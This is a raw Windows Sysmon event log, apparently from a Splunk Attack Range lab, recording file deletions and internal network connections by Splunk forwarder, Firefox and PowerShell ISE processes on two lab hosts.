21:48:09.704{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55449-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000152149Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:12.797{39BD8DE3-0F65-60CA-1200-00000000D101}960NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=6B7265D95EE503A216FB9C0F5149D45C,SHA256=B5CCCF3BF78BC6650E9DBA30FC102EEA90E895E082B80713A11DDCFAC8BE3645,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152148Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:12.233{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF09C5547144486E0F8052B7EC08E107,SHA256=3158F8EAEC84BEA1008F3A97EA7CEAE0FF1EA152F856C9A2EFEE27EF404EBF51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152147Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:12.160{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FCB8016D3FB30F5353D441D97E3F224C,SHA256=929B088C2E1F9943047949C05B5A4CB30B54591E416373E152F9FF1E37D265D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152151Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:13.281{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F6565AE31878100B49F6BBBBCD50787,SHA256=D3CAEC8B52FFE9CD2EC19938EC03900030A816BD59A8EF03DC00DC52EA3E8790,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000152150Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.980{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58431-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000105291Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:14.260{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98C4E054E43FE4C33E530D163547DD98,SHA256=713358D9CBF9D47441C300048BE2BA8DC81982CB12BE2DE7A5124ED8A483D5C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152152Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:14.296{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A21B798859736F3185900440A66CD94F,SHA256=8B7C2CBB7BEC8146084B1387D923F1AF7958884867AF2AA1DF7C99B4EF2A201A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105292Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:15.626{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7F9E0ECBECC9200ECA3A59FAFB1C5CB,SHA256=6547EA702671709F505E0AD7AA5FDA36C434E476072366E0FE09C36EF92968DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152153Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:15.327{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5375C7C6E795596CF12F82A26E4E1409,SHA256=F5686B17D15D8ECB9C81B7981A554DC890412D9F58D1B790601ADFD5382E686E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105293Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:16.990{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE344722FCA5C03C74C4204EA6DBC5D3,SHA256=54683A9B069EB0D0E2C7C9BB3813014539751BBE67AB61F50F93447D1A0AC6D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152160Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:16.358{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=FDFBFCC6E387ED5412669055C80851CC,SHA256=76E62D9F9D70B78071648F28DBBAEFDBBB862D45A296CD0599C1EB9992040CDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152159Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:16.358{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=17554B6ADBB0B998165E1C2970AD8B86,SHA256=045B3B18D01C725A8293BA9058F97C9CDD3B86C137F07B20A88EAF2793764020,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152158Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:16.358{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=85C001EC8F9BC34A5A20119A2EE28928,SHA256=95C61E0BC516139796573FD7192EA65204B5EBBE83D6166BB70E2639C68DC7BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152157Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:16.358{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=3491D471FBC8E75F76E35D160FA37FF3,SHA256=BDD6D3C062037D3FFA1396939921B85182AFB970FE407400A01ED9E57C5887F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152156Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:16.358{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=22527C82E14CD430E0813E4C01DBC8EA,SHA256=C686D84D4E904E0D3F3C4C0FBFAA0D5094CD7AFDCDE53E7EB409381624868012,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152155Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:16.358{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=47714F9EFC1CBED6E8E7A8AB94130A54,SHA256=02FBD4A7CE5CEABC2F78D81F5BBE6B61FDC9B05C73CA34196EF1C28F4F0EFAC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152154Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:16.342{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7857D29F3162841E5934939267860BAF,SHA256=F7C41B05C5D079F1B9C0813DA607B86915E898FA2B3FFE09CDB71429C5701CDD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105294Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:14.881{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55450-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000152162Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:17.379{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=814BFC13B8C0DEE60577781E2CDE1063,SHA256=392CACA84BAE1C5E32A632E7599B7D8679E2F5B2E31161A204EBAD4A224C05E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152161Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:17.378{39BD8DE3-269B-60CA-EA03-00000000D101}6156WIN-HOST-14\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\6156.xml~RF18065f1.TMPMD5=400B39C52D00FF39E60B91C74A63733D,SHA256=75361EBE398182A3C87957C2D93EC97E3D4C1D9F04A67DFAA0AF23753BF512B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105295Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:18.354{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D23AAF7DFA244B93886A011F786E5E6,SHA256=42E90ADC5ACE9C2DF285E2CCF225C4F22BA71750983C9D56A47F159E66998FF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152165Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:18.394{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D760388CD3552037A531A88AC44F0D3,SHA256=C4F5A1DB9A976525CBB6556D1FEAB381039CE83C7F6EE6A9A12BBB263AAE8BD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152164Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:18.077{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3FEF2FBC5209229C7EB45999102F6EB0,SHA256=384E94317ED23842F3418334B480B2532F29E24073236C2EC3EC32248344A58D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152163Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:18.076{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1AFCD5E49ED3BA5C57F3886D327B1D75,SHA256=E18BAFC0E71E489BC325DDD7FBB3F15E5651BD2C20E77E01FF69A3948696E494,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152167Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:19.395{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CF45EF7C0D5A794645FD96A271A27DF,SHA256=CB23F08A9BC2EFD4C08097E40C4815FCE8FC5CA5D23FC07C05D86DF8CD6D625C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000152166Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:16.877{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58432-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000152168Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:20.410{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EF1D735007FCD318F4E2A8B91AC9576,SHA256=1F6B25C4FE93F12ACF2051A41B2D5CB32EDAA06671DD9C838D609FDA6A0B9E54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152169Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:21.412{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0F59A7A6F10DBFA487B3DF0CE40F9C2,SHA256=91AA8FAC0D95FEC46EC068CD188D47245E404F2DFE0124CE58B9F4B3A170C0D0,IMPHASH=00000000000000000000000000000000falsetrue